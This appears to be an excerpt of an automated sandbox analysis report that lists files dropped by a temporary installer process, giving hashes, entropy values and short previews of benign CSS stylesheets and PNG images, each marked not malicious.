                                                                                                                                                                                                                                                          Preview:/*..AnythingSlider v1.8+ Default theme..By Chris Coyier: http://css-tricks.com..with major improvements by Doug Neiner: http://pixelgraphics.us/..based on work by Remy Sharp: http://jqueryfordesigners.com/.*/../*****************************. SET DEFAULT DIMENSIONS HERE. *****************************/./* change the ID & dimensions to match your slider */.#main_slider { ..width: 992px; ..height: 352px;..list-style: none;../* Prevent FOUC (see FAQ page) and keep things readable if javascript is disabled */..overflow-y: auto;..overflow-x: hidden;.}../*.caption{..filter:alpha(opacity=0);..-moz-opacity: 0;..opacity: 0;.}*/../******************. SET STYLING HERE. ******************. =================================. Default state (no keyboard focus). ==================================*/./* Overall Wrapper */..anythingSlider-default {..margin: 0 auto;../* 45px right & left padding for the arrows, 28px @ bottom for navigation */..padding:0;.}./* slider window - top & bottom borders, default
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 52 x 44, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5834
                                                                                                                                                                                                                                                          Entropy (8bit):7.9212427160575425
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:PSDZ/I09Da01l+gmkyTt6Hk8nTNNtt/qXgfUmbtKXla2oVvcdWYrIgvPUSxMl:PSDS0tKg9E05TNNtlfUmIXlaZVvcdzIr
                                                                                                                                                                                                                                                          MD5:F3E723BB70B07629C0A18763CD74EBE3
                                                                                                                                                                                                                                                          SHA1:0450CC4E9FEC6C3FD446E2B3D3E68D03D37933A8
                                                                                                                                                                                                                                                          SHA-256:1216AF29845B020BD410C9A4B0B2B0C6B2D528D5C6DDDA7BBDA0A905B4DDC84D
                                                                                                                                                                                                                                                          SHA-512:0E9B25744201D9C3DFE27BE2497A2B6B769846A77E3CEADAB0A6B916B0F342A8EFC13A0817036883D36E7461276004D3B57CE648B9C4C771656CE6FE8B9FB071
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...4...,.....].......pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4266
                                                                                                                                                                                                                                                          Entropy (8bit):4.888037026868242
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:96:FL8hjXF4ZFQF9FN/bIbx/yG2aC98ZehV9KF5Kf5k8gItrGZWFXyLYPBYzzDGt50s:F4xCKHT/bIbty19ee79KF5K68gI/yLsT
                                                                                                                                                                                                                                                          MD5:94AED20EA3D620951F905B410B0058B2
                                                                                                                                                                                                                                                          SHA1:0D4EA80D39F277A92FD4946CFB60EDFDEC72FADD
                                                                                                                                                                                                                                                          SHA-256:4A2DE64E3701F68BE8FE448B569E3E2D36E54EA4AC59C25C91209F657ADD6C89
                                                                                                                                                                                                                                                          SHA-512:FC5C107B7275A54966CC575EFAB496BF8D1BC3048D4ACD8916A62E0FE8B29AEDB4C44DE4513645CD4837ED58EBDF337BC3C9768E427B2DB3CF5D86CE07050649
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.b-core-ui-select { . margin:10px 0 0 0;. position: relative;. width: 86%;. padding: 6px 10px 6px 12px;. font-size: 12px;. line-height: 18px;. color: #333;. text-shadow: 0 1px 1px rgba(255, 255, 255, 0.75);. cursor: pointer;. background-color: #f3f3f3;. background-image: -ms-linear-gradient(top, #f3f3f3, #fff);. background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#f3f3f3), to(#fff));. background-image: -webkit-linear-gradient(top, #f3f3f3, #fff);. background-image: -o-linear-gradient(top, #f3f3f3, #fff);. background-image: linear-gradient(top, #f3f3f3, #fff);. background-image: -moz-linear-gradient(top, #f3f3f3, #fff);. background-repeat: repeat-x;. border: 1px solid #f1f1f1;. border-radius: 16px;. -webkit-box-shadow:inset 2px 2px 2px 0px rgba(0, 0, 0, 0.4);. box-shadow:inset 2px 2px 2px 0px rgba(0, 0, 0, 0.4);. -webkit-user-select: none;. -moz-user-select: none;. -ms-user-select: none;. -o-user-select:
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):4357
                                                                                                                                                                                                                                                          Entropy (8bit):5.086666572264107
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:h7+KZxJqQACHvdNOHAQVVZoxkVSmoAVxrYFQAR8/cr0Rx//rxCP7Rit/i7ri:hiex4CvdK30WvBcAMm9jxCP1iJini
                                                                                                                                                                                                                                                          MD5:1BC699D294BA8BD26942A616C3EA89BF
                                                                                                                                                                                                                                                          SHA1:A9D12A169CB0280B92DE02AB8C6C7C8DC1C1B378
                                                                                                                                                                                                                                                          SHA-256:F54611C97CE99395B222F18FAB12115EA88182BD5FA922B8942DC5E792184D91
                                                                                                                                                                                                                                                          SHA-512:895F0F099AE6A4CDF35B076B84D353762555A74C1A0FCA45DE438E2FD8E0468484FA4480FB84F94AEC42F2FC4EA5939E2A3107B446656D1ABFEAFAE86DCAA2D2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:/**. * Magento. *. * NOTICE OF LICENSE. *. * This source file is subject to the Academic Free License (AFL 3.0). * that is bundled with this package in the file LICENSE_AFL.txt.. * It is also available through the world-wide-web at this URL:. * http://opensource.org/licenses/afl-3.0.php. * If you did not receive a copy of the license and are unable to. * obtain it through the world-wide-web, please send an email. * to license@magentocommerce.com so we can send you a copy immediately.. *. * DISCLAIMER. *. * Do not edit or add to this file if you wish to upgrade Magento to newer. * versions in the future. If you wish to customize Magento for your. * needs please refer to http://www.magentocommerce.com for more information.. *. * @category design. * @package default_modern. * @copyright Copyright (c) 2012 Magento Inc. (http://www.magentocommerce.com). * @license http://opensource.org/licenses/afl-3.0.php Academic Free License (AFL 3.0). */../* Widgets =======================
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):222581
                                                                                                                                                                                                                                                          Entropy (8bit):5.08641292920484
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:nml2NjrkK/xiuWs5su3SIM9eCUQqWC5mK7C:nml2NjrkK/xDsu3DM9eCULWC5mK7C
                                                                                                                                                                                                                                                          MD5:B278DC17F1D04A093886C43920057567
                                                                                                                                                                                                                                                          SHA1:25B6F13A20A79632261A7117F55A3F6575EF1A38
                                                                                                                                                                                                                                                          SHA-256:C4FF671620CD870A457D54F926592092B4323ADA8C085ED75CE3705F2DFA11EF
                                                                                                                                                                                                                                                          SHA-512:BE7C6EA7174ED9F1DD6370B6E18C636C36228C75CD25BEA8E1FB87BEB337912F521AEE6F584A873A0C17DCA87A3E2EAE9F4C26A4F154B78E084AE8EB21E6C742
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:@font-face {. font-family: 'TeXGyreHerosRegular';. src: url('../fonts/texgyreheros-regular-webfont.eot');. src: url('../fonts/texgyreheros-regular-webfont.eot?#iefix') format('embedded-opentype'),. url('../fonts/texgyreheros-regular-webfont.woff') format('woff'),. url('../fonts/texgyreheros-regular-webfont.ttf') format('truetype'),. url('../fonts/texgyreheros-regular-webfont.svg#TeXGyreHerosRegular') format('svg');. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: 'TeXGyreHerosItalic';. src: url('../fonts/texgyreheros-italic-webfont.eot');. src: url('../fonts/texgyreheros-italic-webfont.eot?#iefix') format('embedded-opentype'),. url('../fonts/texgyreheros-italic-webfont.woff') format('woff'),. url('../fonts/texgyreheros-italic-webfont.ttf') format('truetype'),. url('../fonts/texgyreheros-italic-webfont.svg#TeXGyreHerosItalic') format('svg');. font-weight: normal;. font-style: normal;..}..@font-face {. font-family
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):1568
                                                                                                                                                                                                                                                          Entropy (8bit):4.942541983682357
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:24:hwyUwTlgKWSv5JZ0rKvG45jdSYqE2JeXNDs6izDNHZzz:h7+KZxJqQAeXi6i3Vtz
                                                                                                                                                                                                                                                          MD5:6C9118F4F853D7ABC63505FD692D75F3
                                                                                                                                                                                                                                                          SHA1:76B3CE5EC7FBEC277BD5357E2BD6AD2C461D2AEB
                                                                                                                                                                                                                                                          SHA-256:077AA5312F62AC255FAB801D71E08970BC70E2DB469292BD9622B80EA15281C8
                                                                                                                                                                                                                                                          SHA-512:1B81E2879067223419D09B4C6DF8A90F1255CD707EBEF0C490701E4701B721A7D4AC65860EB04083B51EB2F4CDD02D53AE880D6CD5534FF2A53C4824BE5D9E78
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:/**. * Magento. *. * NOTICE OF LICENSE. *. * This source file is subject to the Academic Free License (AFL 3.0). * that is bundled with this package in the file LICENSE_AFL.txt.. * It is also available through the world-wide-web at this URL:. * http://opensource.org/licenses/afl-3.0.php. * If you did not receive a copy of the license and are unable to. * obtain it through the world-wide-web, please send an email. * to license@magentocommerce.com so we can send you a copy immediately.. *. * DISCLAIMER. *. * Do not edit or add to this file if you wish to upgrade Magento to newer. * versions in the future. If you wish to customize Magento for your. * needs please refer to http://www.magentocommerce.com for more information.. *. * @category design. * @package default_modern. * @copyright Copyright (c) 2012 Magento Inc. (http://www.magentocommerce.com). * @license http://opensource.org/licenses/afl-3.0.php Academic Free License (AFL 3.0). */.* { background:none !important;
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 346 x 54, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):20030
                                                                                                                                                                                                                                                          Entropy (8bit):7.985863672702684
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:KJXE050lAI9uOflF5XFBw+q7hYwPXsUoRGf0wp4vF:K350f95fl1uD7/XuC4vF
                                                                                                                                                                                                                                                          MD5:E01B942B6936DF2AF64EE809086A5334
                                                                                                                                                                                                                                                          SHA1:6601FE8901F8F131CF47352896B01C8DCFD4C963
                                                                                                                                                                                                                                                          SHA-256:E5FEAB5FF923032A51C09F3D61DB2C4AE052CEA6691F034F397207EACC3C2283
                                                                                                                                                                                                                                                          SHA-512:8B21E8B99218F8A0646A418BF3B184A7F8BA1A8061A60383E1EF0BECF85CD07DD68478AD8225A17ED1458DCCC49585B77FF77407F016D95FE57FAD3E8C305BE9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...Z...6.......au....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19946
                                                                                                                                                                                                                                                          Entropy (8bit):7.9802553970586985
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:PJXE05NCJU1LcNVmza+d5HrM5NKtj7iYGVRMS+GE1aSjk6N86:N35NCJU1LTRrw0tC1VRGGMbv7
                                                                                                                                                                                                                                                          MD5:67762894881BFB63FB6961C18CB31251
                                                                                                                                                                                                                                                          SHA1:0A1E5D5BF083BF5AB745CEF7F2F7DEEA28FA70D4
                                                                                                                                                                                                                                                          SHA-256:9652BA4942B40A66C17785230946AB83320878DA3432B64B5815BFBFF267E247
                                                                                                                                                                                                                                                          SHA-512:549A137F2E628D4BEEF1259F836FCEA8DD8E0C095F43DC9E1196CEA410CB232A7A6D8AE43501FA3DE78F6E242F2A66405E9543CF2B803DD1A9FFF2868A7DD653
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...P...P........;....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):163954
                                                                                                                                                                                                                                                          Entropy (8bit):7.997380423199459
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:3072:TXsC50/yArWhc9OsI3zpKpMy4HqUmHtcg/osHXLYlYbxl9NimU:AC5gGgZOKpx4+H0lYbxrK
                                                                                                                                                                                                                                                          MD5:22DCF2D7C51348D365D4C6DB11AAA615
                                                                                                                                                                                                                                                          SHA1:8CFDAD2E3F5757438D9B6A7E42E2EFC1D0378ED4
                                                                                                                                                                                                                                                          SHA-256:30F40B224D899FADEB89099E87B702FAF573914259A955BF3861F4E970C8D9D0
                                                                                                                                                                                                                                                          SHA-512:5B22757CA8BEF67B89CF23ACC51BF6B35F21D203939FE2D6C6E0FC5FCF17BA5486A982BA58141E052DDA8D1D58374E68ED33A2E15F359306AAD433EED80C9B24
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............[.....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:C31305036C6011E28948F21434340203" xmpMM:DocumentID="xmp.did:C31305046C6011E28948F21434340203"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C31305016C6011E28948F21434340203" stRef:documentID="xmp.did:C31305026C6011E28948F21434340203"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...p..|.IDATx..G.$Iz&.*tD.|.tuOuO..g0..X.....H..F.......N{ .<.@..5#y......b...aX..@...iY.....;.../2#2.j15Hk..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):29784
                                                                                                                                                                                                                                                          Entropy (8bit):7.980725536896858
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:RJXE05H3FyEuuqIMky+JU2JzDvj4Ygzc+Cv23bS5PdnFKo79yBbKafVLgkjPSTjG:z35I4qWNJVzAYkl3G51odZfmjymQ7l
                                                                                                                                                                                                                                                          MD5:4C0A6A977EB10BA6ACB252E1C29141F7
                                                                                                                                                                                                                                                          SHA1:3F5E32E79A7D3DB63C8D0BFF06CE43DF0EC6092F
                                                                                                                                                                                                                                                          SHA-256:91853EDF8E536457D93044FCAA5412807368B6B6C88366E05738F3C8A4D031BC
                                                                                                                                                                                                                                                          SHA-512:6C016AABA1B638EC8B2D22CE0AC4B23F662F9D2A372CA016ED5CFDDD72FAAD1A876600E78EEAB27DDE1FAAB47A43AE7CE805B33C43218240BAAC006DA74E569B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...z...'......9g.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 122 x 295, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):29784
                                                                                                                                                                                                                                                          Entropy (8bit):7.980725536896858
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:RJXE05H3FyEuuqIMky+JU2JzDvj4Ygzc+Cv23bS5PdnFKo79yBbKafVLgkjPSTjG:z35I4qWNJVzAYkl3G51odZfmjymQ7l
                                                                                                                                                                                                                                                          MD5:4C0A6A977EB10BA6ACB252E1C29141F7
                                                                                                                                                                                                                                                          SHA1:3F5E32E79A7D3DB63C8D0BFF06CE43DF0EC6092F
                                                                                                                                                                                                                                                          SHA-256:91853EDF8E536457D93044FCAA5412807368B6B6C88366E05738F3C8A4D031BC
                                                                                                                                                                                                                                                          SHA-512:6C016AABA1B638EC8B2D22CE0AC4B23F662F9D2A372CA016ED5CFDDD72FAAD1A876600E78EEAB27DDE1FAAB47A43AE7CE805B33C43218240BAAC006DA74E569B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR...z...'......9g.....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):222581
                                                                                                                                                                                                                                                          Entropy (8bit):5.08641292920484
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:6144:nml2NjrkK/xiuWs5su3SIM9eCUQqWC5mK7C:nml2NjrkK/xDsu3DM9eCULWC5mK7C
                                                                                                                                                                                                                                                          MD5:B278DC17F1D04A093886C43920057567
                                                                                                                                                                                                                                                          SHA1:25B6F13A20A79632261A7117F55A3F6575EF1A38
                                                                                                                                                                                                                                                          SHA-256:C4FF671620CD870A457D54F926592092B4323ADA8C085ED75CE3705F2DFA11EF
                                                                                                                                                                                                                                                          SHA-512:BE7C6EA7174ED9F1DD6370B6E18C636C36228C75CD25BEA8E1FB87BEB337912F521AEE6F584A873A0C17DCA87A3E2EAE9F4C26A4F154B78E084AE8EB21E6C742
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:@font-face {. font-family: 'TeXGyreHerosRegular';. src: url('../fonts/texgyreheros-regular-webfont.eot');. src: url('../fonts/texgyreheros-regular-webfont.eot?#iefix') format('embedded-opentype'),. url('../fonts/texgyreheros-regular-webfont.woff') format('woff'),. url('../fonts/texgyreheros-regular-webfont.ttf') format('truetype'),. url('../fonts/texgyreheros-regular-webfont.svg#TeXGyreHerosRegular') format('svg');. font-weight: normal;. font-style: normal;.}..@font-face {. font-family: 'TeXGyreHerosItalic';. src: url('../fonts/texgyreheros-italic-webfont.eot');. src: url('../fonts/texgyreheros-italic-webfont.eot?#iefix') format('embedded-opentype'),. url('../fonts/texgyreheros-italic-webfont.woff') format('woff'),. url('../fonts/texgyreheros-italic-webfont.ttf') format('truetype'),. url('../fonts/texgyreheros-italic-webfont.svg#TeXGyreHerosItalic') format('svg');. font-weight: normal;. font-style: normal;..}..@font-face {. font-family
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 520 x 260, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):163954
                                                                                                                                                                                                                                                          Entropy (8bit):7.997380423199459
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:3072:TXsC50/yArWhc9OsI3zpKpMy4HqUmHtcg/osHXLYlYbxl9NimU:AC5gGgZOKpx4+H0lYbxrK
                                                                                                                                                                                                                                                          MD5:22DCF2D7C51348D365D4C6DB11AAA615
                                                                                                                                                                                                                                                          SHA1:8CFDAD2E3F5757438D9B6A7E42E2EFC1D0378ED4
                                                                                                                                                                                                                                                          SHA-256:30F40B224D899FADEB89099E87B702FAF573914259A955BF3861F4E970C8D9D0
                                                                                                                                                                                                                                                          SHA-512:5B22757CA8BEF67B89CF23ACC51BF6B35F21D203939FE2D6C6E0FC5FCF17BA5486A982BA58141E052DDA8D1D58374E68ED33A2E15F359306AAD433EED80C9B24
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............[.....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Macintosh)" xmpMM:InstanceID="xmp.iid:C31305036C6011E28948F21434340203" xmpMM:DocumentID="xmp.did:C31305046C6011E28948F21434340203"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:C31305016C6011E28948F21434340203" stRef:documentID="xmp.did:C31305026C6011E28948F21434340203"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...p..|.IDATx..G.$Iz&.*tD.|.tuOuO..g0..X.....H..F.......N{ .<.@..5#y......b...aX..@...iY.....;.../2#2.j15Hk..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):19946
                                                                                                                                                                                                                                                          Entropy (8bit):7.9802553970586985
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:PJXE05NCJU1LcNVmza+d5HrM5NKtj7iYGVRMS+GE1aSjk6N86:N35NCJU1LTRrw0tC1VRGGMbv7
